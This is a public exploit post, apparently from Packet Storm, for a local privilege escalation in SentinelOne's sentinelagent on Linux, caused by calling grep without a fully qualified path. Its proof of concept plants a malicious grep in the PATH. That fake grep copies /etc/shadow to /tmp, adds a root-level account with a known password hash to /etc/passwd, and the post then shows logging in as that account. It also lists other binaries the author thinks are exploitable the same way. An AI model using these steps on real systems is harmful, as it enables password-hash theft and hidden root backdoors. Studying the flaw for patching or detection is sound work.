

SentinelOne sentinelagent Privilege Escalation

SentinelOne sentinelagent version on Linux suffers from a privilege escalation vulnerability due to not use a fully qualified path when calling grep.

Packet Storm

Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability
Date: 12/06/2022
Exploit Author: ouch_this_hurts
Vendor Homepage:
Software Link:
Tested on: Ubuntu 22.04.x

Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)


  • If I Google you, and I cannot find an easy way to report the vulnerability, I’m not going to bother.
  • If you require me to use HackerOne, I’m not going to bother.
  • If you dont have a security.txt, how do you expect me to contact you?

Get root on a system with sentinelagent<= with one simple trick:

Override grep in the PATH with your malicious code. Reboot. pwnd. Nice!

PoC below:

  1. Find the systems “earliest” PATH, or just override it to whatever you want in /etc/environment with some other staged exploit.

  2. Create the following grep file in that directory and make sure its executable:

    cat << SENTINELOOPS > /usr/local/bin/grep  
    # I think I'll have the passwds pl0x  
    cat /etc/shadow > /tmp/etc_shadow
    # password is password :)  
    echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd  
    chmod +x /usr/local/bin/grep  
  3. Wait for machine to reboot, login as sentinel_oops:password :)

    $ su sentinel_oops  
    # whoami   

What actually happened here? On sentinelagent start it runs sh -c "grep....".

So there are potentially other ways of privilege escalation via this "agent"?

  • grep as demonstrated above
  • pgrep examining the binary appears to be vulnerable
  • xargs examining the binary appears to be vulnerable
  • cat examining the binary appears to be vulnerable
  • pgrep examining the binary appears to be vulnerable
  • ldd examining the binary appears to be vulnerable
  • lsmod examining the binary appears to be vulnerable
  • mksh examining the binary appears to be vulnerable
  • awk examining the binary appears to be vulnerable

CWE-427 and how to write secure software

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